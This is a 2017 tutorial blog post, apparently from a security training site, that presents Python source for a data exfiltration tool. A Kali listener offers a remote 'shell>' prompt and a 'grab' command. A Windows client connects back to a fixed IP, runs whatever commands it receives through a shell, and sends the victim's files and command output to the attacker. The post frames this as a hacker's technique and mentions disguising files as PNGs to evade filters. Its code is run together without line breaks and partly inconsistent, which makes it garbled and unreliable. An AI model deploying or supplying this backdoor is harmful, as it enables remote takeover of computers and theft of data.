0P3N Blog Blog Post

Python data_exfiltration with socket programming and network

By: HEGA GEOFFROY
December 19, 2017
 dataexfiltration is the technic used by the hacker for unauthorized the transfer of data of victim Computer in the hacker computer. The hacker used malicous program to upload in the remote computer and after when the victim computer are infected , the hacker take the control of remote computer and start to exfiltred the data or files to his computer , or another name of this kind of hacking is extrusion the data , both is the same.Socket Programming is a running process between computers. The process is accomplished by the communication. Generally, internet communication is the best way for communication. The implementation of this process is done with the API (Application Programming Interface) to communicate with the protocol stack.A protocol stack is TCP. UDP protocols are the combination of IP addresses, and a port protocol is doing the transfer of information, packet, data in the network. This transfer of information in the network is controlled by the subprocesses. But, what are subprocesses? A subprocess in simple language is the technique used to take control of another process, or hijack another process, or spawn another process, or redirect another process in another process.  Now i want to explain how to program dataexfiltration with socket programming and networking in python languageThe first computer is the server A >> Kali Linux  and configuration of interfaceroot# ifconfig eth0 192.168.1.15 netmask 255.255.255.0 updata_exfiltration_server.py #!/usr/bin/env python import socketimport sysimport os if len(sys.argv) <=2:print "Usage python data_exfiltration_server.py <host> <port>"exit()def transfer(conn,command):conn.send(command)file_object = open("/home/videos/test.png" , "wb")while True:bits = conn.recv(1024)if 'Unable to find the file' in bits:print '[-] Unable to find file'breakif bits.endswith('DONE'):print '[+] Transfer Completed'file_object.close()breakfile_object.write(bits)def connect_server(): host = sys.argv[1]port = int(sys.argv[2]) socket_object = socket.socket(socket.AF_INET , socket.SOCK_STREAM)socket_object.bind((host , port))socket_object.listen(1)print '[+] Listening for incomming connection'conn,addr = socket_object.accept()print '[+] we got a connection from:', addr while True:command = raw_input("shell>")if 'terminate' in command:conn.send('terminate')conn.close()breakelif 'grab' in command:transfer(conn,command)else:conn.send(command)print conn.recv(1024)connect_server()explanation of the code : import sys >> library for usageimport socket >> library for use socket and functionimport os >> control all the system def transfer(conn,command) >> function to transfer file and receive in the png format in the remote computer after rename the file in the real format this technic allowed the hacker to bypass easily the filter host >> address to serverport >> port to server socket.socket() >> function to connect with the api in the networkbind() >> function to client to connect in the server at this address and at this portlisten() >> wait the incomming connection of the clientaccept() >> accept the incomming connection of the clientraw_input() >> open the shell if the connection with the client is goodgrab command to transfer any file in the serversend() function to use for send the commandrecv() function to use for receive the data who is transferedexecute the code:python data_exfiltration_server.py 192.168.1.15 8080Listening for incomming connection Client B  >> windows7 and configure the interface with 192.168.1.12/24#!/usr/bin/env pythonimport osimport socketimport subprocessdef transfer(socket_object,path):if os.path.exists(path):file_object = open(path, "rb")contents = file_object.read(1024)while contents != '':socket_object.send(contents)contents = file_object.read(1024)socket_object.send('DONE')file_object.close()else:socket_object.send('Unable to find file')def connect_client():socket_object = socket.socket(socket.AF_INET , socket.SOCK_STREAM)socket_object.connect(('192.168.1.15' , 8080))while True:command = socket_object.recv(1024)if 'terminate' in command:sock_object.close()break elif 'grab' in command:grab,path = command.split('*')try:transfer(socket_object,path)except Exception, e:socket_object.send( str(e) )passelse:cmd = subprocess.Popen(command , shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)socket_object.send( cmd.stdout.read() )socket_object.send( cmd.stderr.read() )def main ():connect_client()main()code explanationimport os >> os for systemimport subprocess >> library for use subprocess funnctionimport socket >> library for socket api in the networkdef transfer(socket_object,path) >> now this the function to transfer the data to client in the server, read the content and send it into the server , powerful functionsocket.socket() >> socket functionconnect() >> connect to the serversubprocess.Popen() >> open the shell in the servergrab command to grab the data , and transfer the file in the serverconnection the client to the serverpython data_exfiltration_client.py 192.168.1.15 8080and you have this in the server , the shell is open  , and grab the file to transfer the data in the remote computershell >> grab*file.exeexemple if the client computer is windows7  , you transfer the malicious file.exe in the server and execute them in the serverThis 2 programs is good to execute with 2 differents operating systemServer A is Kali LinuxClient B is windows7-- INSERT --                                                                                                                        1,8           Top 

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry